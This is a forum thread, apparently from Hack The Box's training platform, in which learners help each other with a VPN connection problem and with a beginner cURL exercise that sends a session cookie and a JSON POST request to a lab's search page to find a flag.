Got the same Issue for over 2 hours, who can help me with it, please?
EDIT: Had an UDP connection, changed it to TCP and set to Modem and it worked 🙂

Yeah... Issues like that can be really annoying. You think it's you, spend two hours troubleshooting and then realize it was an error with the box.

Had a similar issue the other day. But, I learned some new things in the process, while frantically trying to fix the problem (which I ultimately solved by just resetting the target)

If something really seems like it should work, but it mysteriously doesn't, maybe you should just restart the target and take a bathroom break.

Get a session cookie through a valid login, and then use the cURL cookie to search for the flag using a JSON POST request to '/search.php ' I received the cookies and made json post requests with the found cookies.. but I can't find the flag.
Where is my mistake?

It would be nice to include which module/section you are doing in your message

Cracking into Hack the Box

have you specified Content-Type? have you included -d flag in your request? also double check the format of provided cookies (it should be -b 'PHPSESSID=1234abc').

1. better not to share full command

2. you can't see the flag if you search for it?

I can't find the flag

I mean when you replace "london" with "flag" you can't see it?

is it really necessary to change?)

Yes.

thank you, I think it's not like that, but it's simple, I'm an idiot, thank you)